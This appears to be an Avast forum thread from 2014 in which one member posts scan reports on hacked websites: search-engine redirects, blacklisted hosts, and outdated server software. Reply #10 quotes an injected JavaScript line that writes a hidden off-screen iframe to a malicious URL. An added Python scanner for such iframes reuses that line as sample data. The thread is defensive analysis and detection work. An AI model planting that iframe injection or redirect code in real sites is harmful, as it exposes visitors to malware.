Topic: SE redirect and more?


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
SE redirect and more?
« on: August 05, 2014, 10:57:00 PM »
Sucuri flags as with malware: Malware   Detected   Critical   
ISSUE DETECTED           DEFINITION            INFECTED URL
Internal Server Error   500-error?v1            htxp://amdc1786.com/404testpage4525d2fdc
Website Malware   MW:HTA:7   http://amdc1786.com/
Site error detected. Details: http://labs.sucuri.net/db/malware/500-error?v1
HTTP/1.1 500 Internal Server Error
SE visitors redirects or external link to htxp://www.116188.com/   (campaign: http://evuln.com/labs/redirect/www.116188.com/)
Visitors from search engines are redirected
to: htxp://www.116188.com/
474 sites infected with redirects to this URL
code directing to htxp://tp4.sinaimg.cn/2428793371/50/5624619302/1  Wish support -  Hallo sina!

Site found to be benign: http://zulu.zscaler.com/submission/show/51b24d56d5e182c434381b5b7d3db9a3-1407271339
Netcraft risk 1/10 -> http://toolbar.netcraft.com/site_report?url=http://amdc1786.com

Here I get a 404 error http://linkeddata.informatik.hu-berlin.de/uridbg/index.php?url=http%3A%2F%2Famdc1786.com%2Ftj.js&useragentheader=&acceptheader=

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: SE redirect and more?
« Reply #1 on: August 05, 2014, 11:23:52 PM »
See: http://killmalware.com/junalab.com/#
SE visitors redirects via obfuscated PHP code *
Visitors from search engines are redirected
to: htxp://aozpta.mrbonus.com/
aozpta.mrbonus dot com is reported by Yandex as suspicious
3164 sites infected with redirects to this URL
Sucuri scan reports:
Website Malware malware-entry-mwblacklisted35 htxp://junalab.com/20140418/
Website Malware malware-entry-mwblacklisted35 htxp://junalab.com/category/tool/
Website Malware malware-entry-mwblacklisted35 htxp://junalab.com/20140402/

Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35 Location: htxp://aozpta.mrbonus.com/
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35 Location: htxp://aozpta.mrbonus.com/

External link check:
Please check this list for unknown links on your website:

htxp://www.dlmarket.jp/manufacture/index.php?consignors_id=4  -->  ''
htxp://www.dlmarket.jp/products/detail/262630  -->  ''
htxp://www.dlmarket.jp/products/detail/125456  -->  ''
htxp://www.dlmarket.jp/manufacturer.php/manufacturers_id/473  -->  'history2chart'

IDS alerts here: http://urlquery.net/report.php?id=1407272604852

Given as benign here: http://zulu.zscaler.com/submission/show/90a5349bdce8f3fd2b82c6e9bcd6c1d4-1407272473

IP badness history: https://www.virustotal.com/nl/ip-address/91.146.108.80/information/
Over 850 site domains on one and the same IP

Nothing blocked by avast! 

* Description of how the malware functions is given here by the renowned expert Redleg (the fileviewer guru):
https://productforums.google.com/forum/#!topic/webmasters/Xo0QoOnrhv0

polonus

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: SE redirect and more?
« Reply #2 on: August 07, 2014, 10:00:12 AM »
See: http://killmalware.com/tsurkan.ru/#
SE visitors redirects
Visitors from search engines are redirected
to: htxp://redesorpserthea26.acmetoy.com/wstat/accepter.php?h=tsurkan.ru&u=/&f=60c9b82cf1cc2991008bc0dee0cfc093&d=d8e60afa912a144a8c6191b602e74808&r=/home/omivalka/public_html/tsurkan.ru
3 sites infected with redirects to this URL
index
Severity:   Suspicious
Reason:   Detected suspicious redirection to external web resources at HTTP level.
Details:   Detected HTTP redirection to htxp://redesorpserthea26.acmetoy.com/wstat/accepter.php?h=tsurkan.ru%26u=/%26f=60c9b82cf1cc2991008bc0dee0cfc093%26d=d8e60afa912a144a8c6191b602e74808%26r=/home/omivalka/public_html/tsurkan.ru.

Website Outdated cPanel Found   cPanel Security   cPanel 11.42.1.16
Outdated Web Server Apache Found   Vulnerabilities on Apache 2.2   Apache/2.2.25

Not alerted here: http://urlquery.net/report.php?id=1407398164168

pol

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: SE redirect and more?
« Reply #3 on: August 08, 2014, 02:41:52 PM »
Website Malware   malware-entry-mwblacklisted35   htxp://patsecova.com/index.php?appservlang=th
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
Location: htxp://kmlps.mrslove.com/
1579 sites infected with redirects to this URL, re:
https://www.virustotal.com/nl/url/07df993dc412cefa5e07749ee56443fc3b790c6b68c98fd90d5a1a7b22d2824d/analysis/1369806746/

Vulnerabilities: http://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/PHP-PHP.html
via AppServ Open Project 2.5.10
PHP Information Version 5.2.6
Apache Web Server version 2.2.8
PHP Script Language version 5.2.6
MySQL Database version 5.0.51b
phpMyAdmin Database Manager version 2.10.3

polonus

Offline polonus

Re: SE redirect and more?
« Reply #4 on: August 10, 2014, 11:00:25 PM »
http://killmalware.com/mgtravel.net/#
See: Blacklisting status
Yandex reports mgtravel.net as suspicious website
Blacklisted
SE visitors redirects
Visitors from search engines are redirected
to: htXp://www.caribsoft-online.biz/templates/rhuk_solarflare_ii/images/index.php
1165 sites infected with redirects to this URL
See: https://www.virustotal.com/nl/url/f45ee3c2c6f99718e52490cacd03f632929cd7dee6f7966016dc19146d85f2a7/analysis/1407702697/
Blacklisted and site probably compromised via CPanel.
IP badness history: https://www.virustotal.com/nl/ip-address/79.124.75.132/information/

polonus

Offline polonus

Re: SE redirect and more?
« Reply #5 on: August 11, 2014, 04:15:16 PM »
Asafaweb scan results - error and three warnings: https://asafaweb.com/Scan?Url=lhfzsysg.com
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727  via proxy1.1
suspicious file detected:
index
Severity:   Suspicious
Reason:   Detected suspicious redirection to external web resources at HTTP level.
Details:   Detected HTTP redirection to htxp://t.9coku.com/mm/t.htm?lhfzsysg.com.
173 sites infected with redirects to this URL
File size[byte]:   0
File type:   Unknown

IP badness history with 136 domains on same IP: https://www.virustotal.com/nl/ip-address/103.30.7.64/information/

pol

Offline polonus

Re: SE redirect and more?
« Reply #6 on: August 11, 2014, 04:32:57 PM »
Website:   00x dot ru -> http://quttera.com/detailed_report/00x.ru
Status:   Infected With Malware.
SE visitors redirects
Chain of redirects found:
to: htXp://goldline.pro/?partner=pashkela  consider: http://labs.sucuri.net/?details=glbonus.in
15 sites infected with redirects to this URL
to: htxp://glbonus.in/?partner=pashkela
122 sites infected with redirects to this URL
to: htxp://goo.gl/qsao2y
3250 sites infected with redirects to this URL
Website Malware   MW:HTA:7   htxp://00x.ru
System Details:
Running on: Apache/2.2.25
System info: (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6

Suspicious conditional redirect. Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to: htxp://goo.gl/qSaO2y

Web application details:
Running cPanel 11.38.2.6: 00x.ru:2082
cPanel version 11.38.2.6 outdated: Upgrade required.
Outdated cPanel Found: cPanel 11.38.2.6
Outdated Web Server Apache Found: Apache/2.2.25

pol
« Last Edit: August 11, 2014, 04:39:58 PM by polonus »

Offline polonus

Re: SE redirect and more?
« Reply #7 on: August 11, 2014, 08:58:30 PM »
And there is more to the previous scan: http://urlquery.net/report.php?id=1407780894347
in the form of an external link to u6151.55.spylog dot com
-> bad web rep: https://www.mywot.com/en/scorecard/spylog.com?utm_source=addon&utm_content=popup
PHISHing and tracking going on via that external link, read: http://www.wilderssecurity.com/threads/xxx-spylog-com.35828/

polonus

Offline polonus

Re: SE redirect and more?
« Reply #8 on: August 13, 2014, 08:55:09 PM »
Parked and expired site. See: http://killmalware.com/ergosystem.com/
IP badness history: https://www.virustotal.com/nl/ip-address/66.151.181.49/information/
Javascript Check: Suspicious

<script type="text/javascript">document.write(unescape('%3cscript type="text/javascript" src="' + (('https:' == document.location.protocol) ? 'https:' : 'http:') + '//cbi.boldchat.c... *
Google Browser Difference: Not identical

Google: 53961 bytes       Firefox: 50282 bytes
Diff:         3679 bytes

First difference:
<link href="htxp://images.buydomains.com/images/micro.png" rel="shortcut icon"> <link rel="icon" href="htxp://images.buydomains.com/images/favicon.ico" /> <link rel="can...

External link: https://checkout.dev.buydomains.com 
Suspicious web rep: https://www.mywot.com/en/scorecard/boldchat.com?utm_source=addon&utm_content=popup *

Outdated software and vulnerable to SEO spam: Outdated Web Server Apache Found   Vulnerabilities on Apache 2.2   Apache/2.2.15

Suspicious file reported here: http://quttera.com/detailed_report/ergosystem.com
index
Severity:   Suspicious
Reason:   Detected suspicious redirection to external web resources at HTTP level.
Details:   Detected HTTP redirection to htxp://www.buydomains.com/lander/ergosystem.com?domain=ergosystem.com%26utm_source=ergosystem.com%26utm_medium=click%26utm_campaign=TDFS-OO-BDLander%26traffic_id=TDFS-OO-BDLander%26traffic_type=tdfs.
File size[byte]:   0

pol

Offline polonus

Re: SE redirect and more?
« Reply #9 on: August 14, 2014, 04:54:56 PM »
See: http://killmalware.com/handsgg.ru/# & https://www.virustotal.com/nl/url/cc7f310ae20c2ca8a4666dd6f7ccace1d74b413e8bbc8d930d8eac58cbcf07f9/analysis/
Detected: http://sitecheck.sucuri.net/results/clineagency.com
System Details:
Running on: nginx

Web application details:
Application: WordPress 3.4.1 - http://www.wordpress.org
Running cPanel 11.42.1.25: clineagency.com:2082

Web application version:
WordPress version: WordPress 3.4.1
Wordpress version from source: 3.4.1
Wordpress Version 3.3 or 3.4 based on: htxp://clineagency.com/wp-includes/js/autosave.js
WordPress theme: htxp://clineagency.com/wp-content/themes/twentyeleven/
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 3.9.1

Read from our forum member, !Donovan: https://websiteanalystsresource.wordpress.com/tag/portrelay-com/

polonus

Offline polonus

Re: SE redirect and more?
« Reply #10 on: August 15, 2014, 03:26:30 PM »
See: https://www.virustotal.com/nl/url/34b39df83b6a367b330e0453984813f735dd874decdcd9768a9a212d241d8a74/analysis/1408108630/
Blacklisted by Yandex: http://quttera.com/detailed_report/asphalt5.ru

ISSUE DETECTED   DEFINITION   INFECTED URL
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/mootools-core.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/core.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/system/js/caption.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/media/widgetkit/js/jquery.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/cache/widgetkit/widgetkit-b35d7d42.js
Website Malware   mwjs-iframe-injected691?v2   htxp://asphalt5.ru/templates/yoo_vox/warp/js/warp.js
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v2
document.write('<iframe src="htxp://actions.rdenham.co.uk/barbadiga.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
Re: http://urlquery.net/report.php?id=1408108535841

polonus
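Added example, not code from this thread or from Sucuri: a small Python scanner that flags iframes written via document.write() and hidden by off-screen positioning, zero size or CSS, which is the shape of the mwjs-iframe-injected hit quoted above. The sample file contents (a stub library file with the thread's injected line appended, URL kept defanged as "htxp" as the thread quotes it) and the video.example.invalid embed are constructed.

```python
import re

# Matches an <iframe ...> tag written from JavaScript; group 1 = its attributes.
DOCWRITE_IFRAME = re.compile(
    r"document\.write\(\s*['\"][^<]*<iframe\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([\w-]+)\s*=\s*["']([^"']*)["']""")
CSS_PROP = re.compile(r"([\w-]+)\s*:\s*([^;]+)")


def _px(value):
    """Parse an HTML/CSS length such as '-848px' or '0' into an int, else None."""
    m = re.match(r"\s*(-?\d+)\s*(?:px)?\s*$", value)
    return int(m.group(1)) if m else None


def hidden_reason(attrs):
    """Why an iframe with these attributes is invisible to a visitor, or None."""
    a = {k.lower(): v for k, v in ATTR.findall(attrs)}
    style = {k.lower(): v.strip() for k, v in CSS_PROP.findall(a.get("style", ""))}
    offsets = [_px(style[p]) for p in ("left", "top") if p in style]
    if any(v is not None and v < 0 for v in offsets):
        return "positioned off-screen"
    sizes = [_px(a[d]) for d in ("width", "height") if d in a]
    if any(v is not None and v <= 1 for v in sizes):
        return "zero-sized"
    if style.get("display") == "none" or style.get("visibility") == "hidden":
        return "css-hidden"
    return None


def find_injected_iframes(js_source):
    """Return [(src, reason)] for every hidden iframe written via document.write."""
    findings = []
    for m in DOCWRITE_IFRAME.finditer(js_source):
        reason = hidden_reason(m.group(1))
        if reason:
            attrs = {k.lower(): v for k, v in ATTR.findall(m.group(1))}
            findings.append((attrs.get("src", "?"), reason))
    return findings


# Constructed sample: a stub of a site's JS library with the thread's injected
# line appended, plus a benign visible embed that must not be flagged.
SAMPLE_JS = """
var MooTools={version:'1.4.5'};
document.write('<iframe src="htxp://actions.rdenham.co.uk/barbadiga.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>');
document.write('<iframe src="https://video.example.invalid/embed/1" width="560" height="315" style="border:0"></iframe>');
"""

if __name__ == "__main__":
    for src, reason in find_injected_iframes(SAMPLE_JS):
        print(f"{reason}: {src}")
```

Run it over the files Sucuri listed (mootools-core.js, core.js and the rest) after a clean copy of the CMS is restored, so that any hit points at a file that was modified again.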

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37532
  • Not a avast user
Re: SE redirect and more?
« Reply #11 on: August 15, 2014, 04:29:34 PM »
Quote from: polonus on August 15, 2014, 03:26:30 PM (Reply #10 above)

VirusTotal
https://www.virustotal.com/en/file/2032356eae4d1d19a42563a3ecdbd376f0f69a525e8662572031f5eba280baed/analysis/1408112656/
https://www.virustotal.com/en/file/e09708089ab891a507336a96c5b3d2d674a4b9468b5d8687b630f059d3ffe102/analysis/1408112882/